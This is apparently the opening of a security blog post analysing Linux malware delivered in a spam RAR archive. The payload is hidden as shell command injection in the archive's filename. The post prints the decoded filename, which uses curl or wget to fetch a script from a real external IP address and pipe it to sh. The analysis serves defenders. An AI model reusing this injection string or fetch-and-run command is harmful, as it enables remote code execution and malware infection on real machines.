In this blog post, we’ll dissect a real-world, Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file. The payload isn’t hidden inside the file content or a macro, it's encoded directly in the filename itself. Through clever use of shell command injection and base64 encoded Bash payloads, the attacker turns a simple file listing operation into an automatic malware execution trigger.

What’s more alarming is that this tactic bypasses many traditional defenses:

• Antivirus engines don’t usually scan filenames
• Static analysis tools might miss encoded command chains
• Behavioral detection may not flag it unless filename execution occurs

decoded filename:

ziliao2.pdf`{echo,(curl -fsSL -m180 http://47.98.194.60:443/slw||wget -T180 -q \
http://47.98.194.60:443/slw)|sh  }_{base64,-d}_bash`